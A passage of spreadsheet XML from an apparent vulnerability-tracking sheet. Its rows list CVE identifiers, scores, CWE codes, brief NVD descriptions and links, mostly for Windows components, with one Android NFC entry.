      <c r="E683" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F683" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G683" s="5" t="inlineStr"/>
      <c r="H683" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I683" s="5" t="inlineStr"/>
      <c r="J683" s="5" t="inlineStr"/>
      <c r="K683" s="5" t="inlineStr"/>
      <c r="L683" s="5" t="inlineStr"/>
      <c r="M683" s="5" t="inlineStr"/>
      <c r="N683" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O683" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P683" s="5" t="inlineStr"/>
      <c r="Q683" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="R683" s="5" t="inlineStr">
        <is>
          <t>In checkUiccListenConfigNeeded of RoutingManager.cpp, there is a possible out of bounds write due to a missing bounds check. This could lead to remote (proximal/adjacent) code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="S683" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55277</t>
        </is>
      </c>
    </row>
    <row r="684">
      <c r="A684" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B684" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C684" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68827</t>
        </is>
      </c>
      <c r="D684" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E684" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F684" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G684" s="5" t="inlineStr"/>
      <c r="H684" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I684" s="5" t="inlineStr"/>
      <c r="J684" s="5" t="inlineStr"/>
      <c r="K684" s="5" t="inlineStr"/>
      <c r="L684" s="5" t="inlineStr"/>
      <c r="M684" s="5" t="inlineStr"/>
      <c r="N684" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O684" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P684" s="5" t="inlineStr"/>
      <c r="Q684" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-191</t>
        </is>
      </c>
      <c r="R684" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Windows GDI+ allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S684" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68827</t>
        </is>
      </c>
    </row>
    <row r="685">
      <c r="A685" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B685" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C685" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68834</t>
        </is>
      </c>
      <c r="D685" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E685" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F685" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G685" s="5" t="inlineStr"/>
      <c r="H685" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I685" s="5" t="inlineStr"/>
      <c r="J685" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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5" s="5" t="inlineStr"/>
      <c r="M685" s="5" t="inlineStr"/>
      <c r="N685" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O685" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P685" s="5" t="inlineStr"/>
      <c r="Q685" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R685" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S685" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68834</t>
        </is>
      </c>
    </row>
    <row r="686">
      <c r="A686" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B686" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C686" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68838</t>
        </is>
      </c>
      <c r="D686" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E686" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F686" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G686" s="5" t="inlineStr"/>
      <c r="H686" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I686" s="5" t="inlineStr"/>
      <c r="J686" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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6" s="5" t="inlineStr"/>
      <c r="M686" s="5" t="inlineStr"/>
      <c r="N686" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O686" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P686" s="5" t="inlineStr"/>
      <c r="Q686" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R686" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S686" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68838</t>
        </is>
      </c>
    </row>
    <row r="687">
      <c r="A687" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B687" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C687" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68876</t>
        </is>
      </c>
      <c r="D687" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E687" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F687" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G687" s="5" t="inlineStr"/>
      <c r="H687" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I687" s="5" t="inlineStr"/>
      <c r="J687" s="5" t="inlineStr"/>
      <c r="K687" s="5" t="inlineStr"/>
      <c r="L687" s="5" t="inlineStr"/>
      <c r="M687" s="5" t="inlineStr"/>
      <c r="N687" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O687" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P687" s="5" t="inlineStr"/>
      <c r="Q687" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R687" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Program Compatibility Assistant Service allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S687" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68876</t>
        </is>
      </c>
    </row>
    <row r="688">
      <c r="A688" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B688" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C688" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68878</t>
        </is>
      </c>
      <c r="D688" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E688" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F688" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G688" s="5" t="inlineStr"/>
      <c r="H688" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I688" s="5" t="inlineStr"/>
      <c r="J688" s="5" t="inlineStr"/>
      <c r="K688" s="5" t="inlineStr"/>
      <c r="L688" s="5" t="inlineStr"/>
      <c r="M688" s="5" t="inlineStr"/>
      <c r="N688" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O688" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P688" s="5" t="inlineStr"/>
      <c r="Q688" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R688" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Fast FAT Driver allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S688" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68878</t>
        </is>
      </c>
    </row>
    <row r="689">
      <c r="A689" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B689" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C689" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68880</t>
        </is>
      </c>
      <c r="D689" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E689" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F689" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G689" s="5" t="inlineStr"/>
      <c r="H689" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I689" s="5" t="inlineStr"/>
      <c r="J689" s="5" t="inlineStr"/>
      <c r="K689" s="5" t="inlineStr"/>
      <c r="L689" s="5" t="inlineStr"/>
      <c r="M689" s="5" t="inlineStr"/>
      <c r="N689" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O689" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P689" s="5" t="inlineStr"/>
      <c r="Q689" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-197</t>
        </is>
      </c>
      <c r="R689" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S689" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68880</t>
        </is>
      </c>
    </row>
    <row r="690">
      <c r="A690" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B690" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C690" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68894</t>
        </is>
      </c>
      <c r="D690" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E690" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F690" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G690" s="5" t="inlineStr"/>
      <c r="H690" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I690" s="5" t="inlineStr"/>
      <c r="J690" s="5" t="inlineStr"/>
      <c r="K690" s="5" t="inlineStr"/>
      <c r="L690" s="5" t="inlineStr"/>
      <c r="M690" s="5" t="inlineStr"/>
      <c r="N690" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O690" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P690" s="5" t="inlineStr"/>
      <c r="Q690" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R690" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S690" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68894</t>
        </is>
      </c>
    </row>
    <row r="691">
      <c r="A691" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B691" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C691" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69271</t>
        </is>
      </c>
      <c r="D691" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E691" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F691" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G691" s="5" t="inlineStr"/>
      <c r="H691" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I691" s="5" t="inlineStr"/>
      <c r="J691" s="5" t="inlineStr"/>
      <c r="K691" s="5" t="inlineStr"/>
      <c r="L691" s="5" t="inlineStr"/>
      <c r="M691" s="5" t="inlineStr"/>
      <c r="N691" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O691" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P691" s="5" t="inlineStr"/>
      <c r="Q691" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R691" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S691" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69271</t>
        </is>
      </c>
    </row>
    <row r="692">
      <c r="A692" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B692" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C692" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69301</t>
        </is>
      </c>
      <c r="D692" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E692" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F692" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G692" s="5" t="inlineStr"/>
      <c r="H692" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I692" s="5" t="inlineStr"/>
      <c r="J692" s="5" t="inlineStr"/>
      <c r="K692" s="5" t="inlineStr"/>
      <c r="L692" s="5" t="inlineStr"/>
      <c r="M692" s="5" t="inlineStr"/>
      <c r="N692" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O692" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P692" s="5" t="inlineStr"/>
      <c r="Q692" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R692" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S692" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69301</t>
        </is>
      </c>
    </row>
    <row r="693">
      <c r="A693" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B693" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C693" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69322</t>
        </is>
      </c>
      <c r="D693" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E693" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F693" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G693" s="5" t="inlineStr"/>
      <c r="H693" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I693" s="5" t="inlineStr"/>
      <c r="J693" s="5" t="inlineStr"/>
      <c r="K693" s="5" t="inlineStr"/>
      <c r="L693" s="5" t="inlineStr"/>
      <c r="M693" s="5" t="inlineStr"/>
      <c r="N693" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O693" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P693" s="5" t="inlineStr"/>
      <c r="Q693" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="R693" s="5" t="inlineStr">
        <is>
          <t>Double free in Microsoft Windows Search Component allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S693" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69322</t>
        </is>
      </c>
    </row>
    <row r="694">
      <c r="A694" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B694" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C694" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69332</t>
        </is>
      </c>
      <c r="D694" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E694" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F694" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G694" s="5" t="inlineStr"/>
      <c r="H694" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I694" s="5" t="inlineStr"/>
      <c r="J694" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6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4" s="5" t="inlineStr"/>
      <c r="M694" s="5" t="inlineStr"/>
      <c r="N694" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O694" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P694" s="5" t="inlineStr"/>
      <c r="Q694" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R694" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S694" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69332</t>
        </is>
      </c>
    </row>
    <row r="695">
      <c r="A695" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B695" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C695" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69346</t>
        </is>
      </c>
      <c r="D695" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E695" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F695" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G695" s="5" t="inlineStr"/>
      <c r="H695" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I695" s="5" t="inlineStr"/>
      <c r="J695" s="5" t="inlineStr"/>
      <c r="K695" s="5" t="inlineStr"/>
      <c r="L695" s="5" t="inlineStr"/>
      <c r="M695" s="5" t="inlineStr"/>
      <c r="N695" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O695" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P695" s="5" t="inlineStr"/>
      <c r="Q695" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R695" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S695" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69346</t>
        </is>
      </c>
    </row>
    <row r="696">
      <c r="A696" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B696" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C696" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69365</t>
        </is>
      </c>
      <c r="D696" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E696" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F696" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G696" s="5" t="inlineStr"/>
      <c r="H696" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I696" s="5" t="inlineStr"/>
      <c r="J696" s="5" t="inlineStr"/>
      <c r="K696" s="5" t="inlineStr"/>
      <c r="L696" s="5" t="inlineStr"/>
      <c r="M696" s="5" t="inlineStr"/>
      <c r="N696" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O696" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P696" s="5" t="inlineStr"/>
      <c r="Q696" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R696" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Local Security Authority Server (lsasrv) allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S696" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69365</t>
        </is>
      </c>
    </row>
    <row r="697">
      <c r="A697" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B697" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C697" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69371</t>
        </is>
      </c>
      <c r="D697" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E697" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F697" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G697" s="5" t="inlineStr"/>
      <c r="H697" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I697" s="5" t="inlineStr"/>
      <c r="J697" s="5" t="inlineStr"/>
      <c r="K697" s="5" t="inlineStr"/>
      <c r="L697" s="5" t="inlineStr"/>
      <c r="M697" s="5" t="inlineStr"/>
      <c r="N697" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O697" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P697" s="5" t="inlineStr"/>
      <c r="Q697" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R697" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Overlay Filter allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S697" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69371</t>
        </is>
      </c>
    </row>
    <row r="698">
      <c r="A698" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B698" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C698" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69412</t>
        </is>
      </c>
      <c r="D698" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E698" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F698" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G698" s="5" t="inlineStr"/>
      <c r="H698" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I698" s="5" t="inlineStr"/>
      <c r="J698" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K698" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L698" s="5" t="inlineStr"/>
      <c r="M698" s="5" t="inlineStr"/>
      <c r="N698" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O698" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P698" s="5" t="inlineStr"/>
      <c r="Q698" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R698" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows DHCP Server allows an authorized attacker to execute code over an adjacent network.</t>
        </is>
      </c>
      <c r="S698" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69412</t>
        </is>
      </c>
    </row>
    <row r="699">
      <c r="A699" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B699" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C699" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69418</t>
        </is>
      </c>
      <c r="D699" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E699" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F699" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G699" s="5" t="inlineStr"/>
      <c r="H699" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I699" s="5" t="inlineStr"/>
      <c r="J699" s="5" t="inlineStr"/>
      <c r="K699" s="5" t="inlineStr"/>
      <c r="L699" s="5" t="inlineStr"/>
      <c r="M699" s="5" t="inlineStr"/>
      <c r="N699" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O699" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P699" s="5" t="inlineStr"/>
      <c r="Q699" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R699" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Volume Manager Driver allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S699" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69418</t>
        </is>
      </c>
    </row>
    <row r="700">
      <c r="A700" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B700" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C700" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69423</t>
        </is>
      </c>
      <c r="D700" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E700" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F700" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G700" s="5" t="inlineStr"/>
      <c r="H700" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I700" s="5" t="inlineStr"/>
      <c r="J700" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K7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0" s="5" t="inlineStr"/>
      <c r="M700" s="5" t="inlineStr"/>
      <c r="N700" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O700" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P700" s="5" t="inlineStr"/>
      <c r="Q700" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R700" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Video Driver allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S700" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69423</t>
        </is>
      </c>
    </row>
    <row r="701">
      <c r="A701" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B701" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C701" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69427</t>
        </is>
      </c>
      <c r="D701" s="5" t="n">
        <v>8</v>
      </c>
      <c r="E701" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F701" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G701" s="5" t="inlineStr"/>
      <c r="H701" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I701" s="5" t="inlineStr"/>
      <c r="J701" s="5" t="inlineStr"/>
      <c r="K701" s="5" t="inlineStr"/>
      <c r="L701" s="5" t="inlineStr"/>
      <c r="M701" s="5" t="inlineStr"/>
      <c r="N701" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O701" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P701" s="5" t="inlineStr"/>
      <c r="Q701" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R701" s="5" t="inlineStr">
        <is>
